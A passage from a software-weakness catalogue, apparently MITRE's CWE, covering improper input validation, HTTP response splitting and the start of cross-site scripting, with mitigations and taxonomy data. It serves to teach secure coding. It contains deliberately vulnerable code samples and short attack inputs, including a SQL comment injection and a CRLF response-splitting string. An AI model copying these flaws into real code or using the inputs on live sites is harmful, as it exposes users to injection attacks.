While this code checks to make sure the user cannot specify large, positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two, large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values which will cause an integer overflow (CWE-190) and unexpected behavior will follow depending on how the values are treated in the remainder of the program.

Example 3

The following example shows a PHP application in which the programmer attempts to display a user's birthday and homepage.

(Bad Code)
Example Language: PHP 
$birthday = $_GET['birthday'];
$homepage = $_GET['homepage'];
echo "Birthday: $birthday<br>Homepage: <a href=$homepage>click here</a>"

The programmer intended for $birthday to be in a date format and $homepage to be a valid URL. However, since the values are derived from an HTTP request, if an attacker can trick a victim into clicking a crafted URL with <script> tags providing the values for birthday and / or homepage, then the script will run on the client's browser when the web server echoes the content. Notice that even if the programmer were to defend the $birthday variable by restricting input to integers and dashes, it would still be possible for an attacker to provide a string of the form:

(Attack)
 
2009-01-09--

If this data were used in a SQL statement, it would treat the remainder of the statement as a comment. The comment could disable other security-related logic in the statement. In this case, encoding combined with input validation would be a more useful protection mechanism.

Furthermore, an XSS (CWE-79) attack or SQL injection (CWE-89) are just a few of the potential consequences when input validation is not used. Depending on the context of the code, CRLF Injection (CWE-93), Argument Injection (CWE-88), or Command Injection (CWE-77) may also be possible.

Example 4

This function attempts to extract a pair of numbers from a user-supplied string.

(Bad Code)
Example Language:
void parse_data(char *untrusted_input){
int m, n, error;
error = sscanf(untrusted_input, "%d:%d", &m, &n);
if ( EOF == error ){
die("Did not specify integer value. Die evil hacker!\n");
}
/* proceed assuming n and m are initialized correctly */
}

This code attempts to extract two integer values out of a formatted, user-supplied input. However, if an attacker were to provide an input of the form:

(Attack)
 
123:

then only the m variable will be initialized. Subsequent use of n may result in the use of an uninitialized variable (CWE-457).

Example 5

The following example takes a user-supplied value to allocate an array of objects and then operates on the array.

(Bad Code)
Example Language: Java 
private void buildList ( int untrustedListSize ){
if ( 0 > untrustedListSize ){
die("Negative value supplied for list size, die evil hacker!");
}
Widget[] list = new Widget [ untrustedListSize ];
list[0] = new Widget();
}

This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown.

Example 6

This application has registered to handle a URL when sent an intent:

(Bad Code)
Example Language: Java 
...
IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL");
MyReceiver receiver = new MyReceiver();
registerReceiver(receiver, filter);
...
public class UrlHandlerReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
if("com.example.URLHandler.openURL".equals(intent.getAction())) {
String URL = intent.getStringExtra("URLToOpen");
int length = URL.length();
...
}
}
}

The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called.

+ Observed Examples
ReferenceDescription
Eval injection in Perl program using an ID that should only contain hyphens and numbers.
SQL injection through an ID that was supposed to be numeric.
lack of input validation in spreadsheet program leads to buffer overflows, integer overflows, array index errors, and memory corruption.
insufficient validation enables XSS
driver in security product allows code execution due to insufficient validation
infinite loop from DNS packet with a label that points to itself
infinite loop from DNS packet with a label that points to itself
missing parameter leads to crash
HTTP request with missing protocol version number leads to crash
request with missing parameters leads to information exposure
system crash with offset value that is inconsistent with packet size
size field that is inconsistent with packet size leads to buffer over-read
product uses a blacklist to identify potentially dangerous content, allowing attacker to bypass a warning
security bypass via an extra header
use of extra data in a signature allows certificate signature forging
empty packet triggers reboot
incomplete blacklist allows SQL injection
NUL byte in theme name cause directory traversal impact to be worse
kernel does not validate an incoming pointer before dereferencing it
anti-virus product has insufficient input validation of hooked SSDT functions, allowing code execution
anti-virus product allows DoS via zero-length field
driver does not validate input from userland to the kernel
kernel does not validate parameters sent in from userland, allowing code execution
lack of validation of string length fields allows memory consumption or buffer over-read
lack of validation of length field leads to infinite loop
lack of validation of input to an IOCTL allows code execution
zero-length attachment causes crash
zero-length input causes free of uninitialized pointer
crash via a malformed frame structure
infinite loop from a long SMTP request
router crashes with a malformed packet
packet with invalid version number leads to NULL pointer dereference
crash via multiple "." characters in file extension
+ Potential Mitigations

Phase: Architecture and Design

Strategies: Input Validation; Libraries or Frameworks

Use an input validation framework such as Struts or the OWASP ESAPI Validation API. If you use Struts, be mindful of weaknesses covered by the CWE-101 category.

Phases: Architecture and Design; Implementation

Strategy: Identify and Reduce Attack Surface

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings.

Phase: Implementation

When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined.

Phase: Implementation

Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow.

Phase: Implementation

Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input's values fall within the expected range of allowable values and that multi-field consistencies are maintained.

Phase: Implementation

Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass whitelist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.

Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content.

Phase: Implementation

When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so.

Phase: Testing

Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible.

Phase: Testing

Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory19Data Processing Errors
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class693Protection Mechanism Failure
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory722OWASP Top Ten 2004 Category A1 - Unvalidated Input
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory738CERT C Secure Coding Section 04 - Integers (INT)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory742CERT C Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C Secure Coding Standard734
ChildOfCategoryCategory746CERT C Secure Coding Section 12 - Error Handling (ERR)
Weaknesses Addressed by the CERT C Secure Coding Standard734
ChildOfCategoryCategory747CERT C Secure Coding Section 49 - Miscellaneous (MSC)
Weaknesses Addressed by the CERT C Secure Coding Standard734
ChildOfCategoryCategory7512009 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory872CERT C++ Secure Coding Section 04 - Integers (INT)
Weaknesses Addressed by the CERT C++ Secure Coding Standard868
ChildOfCategoryCategory876CERT C++ Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C++ Secure Coding Standard868
ChildOfCategoryCategory883CERT C++ Secure Coding Section 49 - Miscellaneous (MSC)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory994SFP Secondary Cluster: Tainted Input to Variable
Software Fault Pattern (SFP) Clusters (primary)888
ChildOfCategoryCategory1005Input Validation and Representation
Seven Pernicious Kingdoms (primary)700
CanPrecedeWeakness ClassWeakness Class22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Research Concepts1000
CanPrecedeWeakness BaseWeakness Base41Improper Resolution of Path Equivalence
Research Concepts1000
CanPrecedeWeakness ClassWeakness Class74Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Research Concepts1000
CanPrecedeWeakness ClassWeakness Class119Improper Restriction of Operations within the Bounds of a Memory Buffer
Research Concepts1000
ParentOfWeakness BaseWeakness Base15External Control of System or Configuration Setting
Seven Pernicious Kingdoms (primary)700
ParentOfCategoryCategory21Pathname Traversal and Equivalence Errors
Development Concepts (primary)699
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ParentOfWeakness ClassWeakness Class73External Control of File Name or Path
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfCategoryCategory100Technology-Specific Input Validation Problems
Development Concepts (primary)699
ParentOfWeakness VariantWeakness Variant102Struts: Duplicate Validation Forms
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant103Struts: Incomplete validate() Method Definition
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant104Struts: Form Bean Does Not Extend Validation Class
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant105Struts: Form Field Without Validator
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant106Struts: Plug-in Framework not in Use
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant107Struts: Unused Validation Form
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant108Struts: Unvalidated Action Form
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant109Struts: Validator Turned Off
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant110Struts: Validator Without Form Field
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base111Direct Use of Unsafe JNI
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base112Missing XML Validation
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base113Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base114Process Control
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base117Improper Output Neutralization for Logs
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base120Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base129Improper Validation of Array Index
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ParentOfWeakness BaseWeakness Base134Use of Externally-Controlled Format String
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base170Improper Null Termination
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base179Incorrect Behavior Order: Early Validation
Development Concepts (primary)699
ParentOfWeakness BaseWeakness Base180Incorrect Behavior Order: Validate Before Canonicalize
Development Concepts (primary)699
ParentOfWeakness BaseWeakness Base181Incorrect Behavior Order: Validate Before Filter
Development Concepts (primary)699
ParentOfWeakness BaseWeakness Base190Integer Overflow or Wraparound
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base466Return of Pointer Value Outside of Expected Range
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base470Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant554ASP.NET Misconfiguration: Not Using Input Validation Framework
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant601URL Redirection to Untrusted Site ('Open Redirect')
Development Concepts (primary)699
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ParentOfWeakness BaseWeakness Base606Unchecked Input for Loop Condition
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant622Improper Validation of Function Hook Arguments
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant626Null Byte Interaction Error (Poison Null Byte)
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfCompound Element: ChainCompound Element: Chain680Integer Overflow to Buffer Overflow
Research Concepts (primary)1000
ParentOfCompound Element: ChainCompound Element: Chain690Unchecked Return Value to NULL Pointer Dereference
Research Concepts (primary)1000
ParentOfCompound Element: ChainCompound Element: Chain692Incomplete Blacklist to Cross-Site Scripting
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant781Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant785Use of Path Manipulation Function without Maximum-sized Buffer
Development Concepts699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant789Uncontrolled Memory Allocation
Research Concepts1000
MemberOfViewView635Weaknesses Used by NVD
Weaknesses Used by NVD (primary)635
+ Relationship Notes

CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks.

However, input validation is not always sufficient, especially when less stringent data types must be supported, such as free-form text. Consider a SQL injection scenario in which a last name is inserted into a query. The name "O'Reilly" would likely pass the validation step since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the "'" apostrophe character, which would need to be escaped or otherwise neutralized. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded.

+ Research Gaps

There is not much research into the classification of input validation techniques and their application. Many publicly-disclosed vulnerabilities simply characterize a problem as "input validation" without providing more specific details that might contribute to a deeper understanding of validation techniques and the weaknesses they can prevent or reduce. Validation is over-emphasized in contrast to other neutralization techniques such as filtering and enforcement by conversion. See the vulnerability theory paper.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsInput validation and representation
OWASP Top Ten 2004A1CWE More SpecificUnvalidated Input
CERT C Secure CodingERR07-CPrefer functions that support error checking over equivalent functions that don't
CERT C Secure CodingINT06-CUse strtol() or a related function to convert a string token to an integer
CERT C Secure CodingMEM10-CDefine and use a pointer validation function
CERT C Secure CodingMSC08-CLibrary functions should validate their parameters
WASC20Improper Input Handling
CERT C++ Secure CodingINT06-CPPUse strtol() or a related function to convert a string token to an integer
CERT C++ Secure CodingMEM10-CPPDefine and use a pointer validation function
CERT C++ Secure CodingMSC08-CPPFunctions should validate their parameters
Software Fault PatternsSFP25Tainted input to variable
+ References
Jim Manico. "Input Validation with ESAPI - Very Important". 2008-08-15. <http://manicode.blogspot.com/2008/08/input-validation-with-esapi.html>.
[REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
Joel Scambray, Mike Shema and Caleb Sima. "Hacking Exposed Web Applications, Second Edition". Input Validation Attacks. McGraw-Hill. 2006-06-05.
Jeremiah Grossman. "Input validation or output filtering, which is better?". 2007-01-30. <http://jeremiahgrossman.blogspot.com/2007/01/input-validation-or-output-filtering.html>.
Kevin Beaver. "The importance of input validation". 2006-09-06. <http://searchsoftwarequality.techtarget.com/tip/0,289483,sid92_gci1214373,00.html>.
[REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 10, "All Input Is Evil!" Page 341. 2nd Edition. Microsoft. 2002.
+ Maintenance Notes

Input validation - whether missing or incorrect - is such an essential and widespread part of secure development that it is implicit in many different weaknesses. Traditionally, problems such as buffer overflows and XSS have been classified as input validation problems by many security professionals. However, input validation is not necessarily the only protection mechanism available for avoiding such problems, and in some cases it is not even sufficient. The CWE team has begun capturing these subtleties in chains within the Research Concepts view (CWE-1000), but more work is needed.

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Potential_Mitigations, Time_of_Introduction
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2008-11-24CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships
2009-03-10CWE Content TeamMITREInternal
updated Description, Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2009-07-27CWE Content TeamMITREInternal
updated Relationships
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences, Demonstrative_Examples, Maintenance_Notes, Modes_of_Introduction, Observed_Examples, Relationships, Research_Gaps, Terminology_Notes
2009-12-28CWE Content TeamMITREInternal
updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors
2010-02-16CWE Content TeamMITREInternal
updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings
2010-04-05CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Potential_Mitigations, Research_Gaps, Terminology_Notes
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations, Relationships
2010-12-13CWE Content TeamMITREInternal
updated Demonstrative_Examples, Description
2011-03-29CWE Content TeamMITREInternal
updated Observed_Examples
2011-06-01CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Relationship_Notes
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Relationships
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2014-02-18CWE Content TeamMITREInternal
updated Demonstrative_Examples, Related_Attack_Patterns
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
2017-05-03CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
Previous Entry Names
Change DatePrevious Entry Name
2009-01-12Insufficient Input Validation

CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

Weakness ID: 113
Abstraction: Base
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

The software receives data from an upstream component, but does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.

Extended Description

Including unvalidated data in an HTTP header allows an attacker to specify the entirety of the HTTP response rendered by the browser. When an HTTP request contains unexpected CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n) characters the server may respond with an output stream that is interpreted as two different HTTP responses (instead of one). An attacker can control the second response and mount attacks such as cross-site scripting and cache poisoning attacks.

HTTP response splitting weaknesses may be present when:

  1. Data enters a web application through an untrusted source, most frequently an HTTP request.

  2. The data is included in an HTTP response header sent to a web user without being validated for malicious characters.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

All

+ Common Consequences
ScopeEffect
Integrity
Access Control

Technical Impact: Modify application data; Gain privileges / assume identity

CR and LF characters in an HTTP header may give attackers control of the remaining headers and body of the response the application intends to send, as well as allowing them to create additional responses entirely under their control.

+ Demonstrative Examples

Example 1

The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.

(Bad Code)
Example Language: Java 
String author = request.getParameter(AUTHOR_PARAM);
...
Cookie cookie = new Cookie("author", author);
cookie.setMaxAge(cookieExpiration);
response.addCookie(cookie);

Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form:

(Good Code)
 
HTTP/1.1 200 OK
...
Set-Cookie: author=Jane Smith
...

However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as

(Attack)
 
Wiley Hacker\r\nHTTP/1.1 200 OK\r\n

then the HTTP response would be split into two responses of the following form:

(Bad Code)
 
HTTP/1.1 200 OK
...
Set-Cookie: author=Wiley Hacker HTTP/1.1 200 OK
...

Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including:

  • cross-user defacement

  • web and browser cache poisoning

  • cross-site scripting

  • page hijacking

Example 2

Cross-User Defacement

An attacker can make a single request to a vulnerable server that will cause the server to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the sever. This can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server.

  • In the best case, an attacker can leverage this ability to convince users that the application has been hacked, causing users to lose confidence in the security of the application.

  • In the worst case, an attacker may provide specially crafted content designed to mimic the behavior of the application but redirect private information, such as account numbers and passwords, back to the attacker.

Example 3

Cache Poisoning

The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user. If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although the user of the local browser instance will be affected.

Example 4

Cross-Site Scripting

Once attackers have control of the responses sent by an application, they have a choice of a variety of malicious content to provide users. Cross-site scripting is common form of attack where malicious JavaScript or other code included in a response is executed in the user's browser.

The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.

The most common and dangerous attack vector against users of a vulnerable application uses JavaScript to transmit session and authentication information back to the attacker who can then take complete control of the victim's account.

Example 5

Page Hijacking

In addition to using a vulnerable application to send malicious content to a user, the same root vulnerability can also be leveraged to redirect sensitive content generated by the server and intended for the user to the attacker instead. By submitting a request that results in two responses, the intended response from the server and the response generated by the attacker, an attacker can cause an intermediate node, such as a shared proxy server, to misdirect a response generated by the server for the user to the attacker.

Because the request made by the attacker generates two responses, the first is interpreted as a response to the attacker's request, while the second remains in limbo. When the user makes a legitimate request through the same TCP connection, the attacker's request is already waiting and is interpreted as a response to the victim's request. The attacker then sends a second request to the server, to which the proxy server responds with the server generated request intended for the victim, thereby compromising any sensitive information in the headers or body of the response intended for the victim.

+ Observed Examples
ReferenceDescription
Application accepts CRLF in an object ID, allowing HTTP response splitting.
HTTP response splitting via CRLF in parameter related to URL.
HTTP response splitting via CRLF in parameter related to URL.
Bulletin board allows response splitting via CRLF in parameter.
Bulletin board allows response splitting via CRLF in parameter.
Response splitting via CRLF in PHPSESSID.
Chain: Application accepts CRLF in an object ID, allowing HTTP response splitting.
Chain: HTTP response splitting via CRLF in parameter related to URL.
+ Potential Mitigations

Phase: Implementation

Strategy: Input Validation

Construct HTTP headers very carefully, avoiding the use of non-validated input data.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

Phase: Implementation

Strategy: Output Encoding

Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.

Phase: Implementation

Strategy: Input Validation

Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass whitelist validation schemes by introducing dangerous inputs after they have been checked.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class20Improper Input Validation
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness BaseWeakness Base93Improper Neutralization of CRLF Sequences ('CRLF Injection')
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory442Web Problems
Development Concepts (primary)699
ChildOfCategoryCategory990SFP Secondary Cluster: Tainted Input to Command
Software Fault Pattern (SFP) Clusters (primary)888
CanPrecedeWeakness BaseWeakness Base79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Research Concepts1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
+ Theoretical Notes

HTTP response splitting is probably only multi-factor in an environment that uses intermediaries.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERHTTP response splitting
7 Pernicious KingdomsHTTP Response Splitting
WASC25HTTP Response Splitting
Software Fault PatternsSFP24Tainted input to command
+ References
[REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting)." Page 31. McGraw-Hill. 2010.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated References, Potential_Mitigations, Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Observed_Example, Other_Notes, References, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Description
2008-11-24CWE Content TeamMITREInternal
updated Description, Other_Notes
2009-03-10CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-05-27CWE Content TeamMITREInternal
updated Name
2009-07-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Potential_Mitigations
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences, Description, Other_Notes, Theoretical_Notes
2010-02-16CWE Content TeamMITREInternal
updated Taxonomy_Mappings
2010-06-21CWE Content TeamMITREInternal
updated Description, Name
2011-03-29CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Description
2012-05-11CWE Content TeamMITREInternal
updated Common_Consequences, References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-06-23CWE Content TeamMITREInternal
updated Demonstrative_Examples
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-05-03CWE Content TeamMITREInternal
updated Related_Attack_Patterns
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11HTTP Response Splitting
2009-05-27Failure to Sanitize CRLF Sequences in HTTP Headers (aka 'HTTP Response Splitting')
2010-06-21Failure to Sanitize CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Weakness ID: 79
Abstraction: Base
Status: Usable
Presentation Filter:
+ Description

Description Summary

The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Extended Description

Cross-site scripting (XSS) vulnerabilities occur when:

1. Untrusted data enters a web application, typically from a web request.

2. The web application dynamically generates a web page that contains this untrusted data.

3. During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.

4. A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data.

